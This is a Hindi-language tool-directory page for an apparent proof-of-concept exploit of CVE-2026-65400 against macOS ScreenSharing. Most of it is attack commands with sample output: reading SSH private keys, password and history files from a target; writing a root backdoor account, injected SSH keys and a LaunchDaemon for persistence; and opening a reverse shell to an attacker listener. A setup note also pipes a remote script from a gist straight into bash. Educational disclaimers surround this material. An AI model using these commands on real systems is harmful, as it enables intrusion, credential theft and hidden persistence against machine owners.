Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-65400 — सीवीई-2026-65400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो macOS पर Apple ScreenSharing के माध्यम से प्रमाणित फ़ाइल पढ़ने/लिखने, रिवर्स शेल और पर्सिस्टेंस को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/horkimhab/cve-2026-65400
विशेषाधिकार वृद्धिस्थायित्व तंत्रशोषणपोस्ट-शोषणप्रमाणीकरणलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

सीवीई-2026-65400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो macOS पर Apple ScreenSharing के माध्यम से प्रमाणित फ़ाइल पढ़ने/लिखने, रिवर्स शेल और पर्सिस्टेंस को सक्षम बनाता है।

रिपॉजिटरी देखें
311023 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2026-65400

दान करें

PayPal के माध्यम से या नीचे दिए गए QR कोड को स्कैन करके इस परियोजना के रखरखाव में सहायता करें।

paypal

दान के लिए QR कोड

⚡ सरल उपयोग

इस परियोजना का उपयोग केवल सुरक्षित और अधिकृत वातावरण में करें, जैसे:

  • स्थानीय वर्चुअल मशीनें
  • Docker कंटेनर
  • पृथक (आइसोलेटेड) लैब सेटअप
  • अधिकृत पैठ परीक्षण वातावरण

उदाहरण सेटअप:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

उदाहरण उपयोग:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

नोट:

  • अन्य परियोजना से क्लोन करने पर नेस्टेड .git निर्देशिका साफ़ करने के लिए आपको curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y चलाना होगा
  • उदा.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

श्रेय या संदर्भ

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 शैक्षिक सुरक्षा अनुसंधान भंडार

नियंत्रित वातावरण में साइबर सुरक्षा अवधारणाओं को सीखने, परीक्षण करने और शोध करने के लिए एक भंडार।


⚠️ सुरक्षा और कानूनी अस्वीकरण

उद्देश्य

यह भंडार केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए है।

इसे उपयोगकर्ताओं को निम्न के बारे में सीखने में मदद करने के लिए डिज़ाइन किया गया है:

  • सुरक्षा कमजोरियाँ
  • सैंडबॉक्स और आइसोलेशन अवधारणाएँ
  • सुरक्षित कोडिंग और रक्षात्मक अभ्यास

केवल अधिकृत उपयोग

इस भंडार का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास अनुमति है, जैसे:

  • व्यक्तिगत लैब या वर्चुअल मशीनें
  • Docker या पृथक (आइसोलेटेड) वातावरण
  • अधिकृत पैठ परीक्षण
  • साइबर सुरक्षा प्रशिक्षण या शैक्षणिक शोध

अनधिकृत या अवैध उपयोग सख्त रूप से निषिद्ध है।


कोई दायित्व नहीं

लेखक और योगदानकर्ता इस परियोजना के कारण होने वाली किसी भी क्षति, दुरुपयोग, कानूनी समस्या या हानि के लिए जिम्मेदार नहीं हैं।

इस भंडार का उपयोग करके, आप सहमत हैं कि:

  • आप अपने स्वयं के कार्यों के लिए जिम्मेदार हैं
  • आप इसका उपयोग कानूनी और नैतिक रूप से करेंगे
  • परियोजना बिना किसी वारंटी के प्रदान की जाती है

नैतिक उपयोग

यह परियोजना निम्न के लिए है:

  • रक्षात्मक सुरक्षा अनुसंधान
  • साइबर सुरक्षा शिक्षा
  • कमजोरियों के प्रति जागरूकता
  • सुरक्षित प्रणाली और सॉफ्टवेयर अनुसंधान

कृपया जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और सभी लागू कानूनों का अनुपालन करें।


संपर्क

जिम्मेदार प्रकटीकरण या सहयोग के लिए, GitHub के माध्यम से भंडार अनुरक्षक से संपर्क करें।


संबंधित परियोजना

अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए अतिरिक्त CVE प्रूफ-ऑफ-कॉन्सेप्ट संसाधनों हेतु PoC CVE Collection देखें।

टूल डाउनलोड करें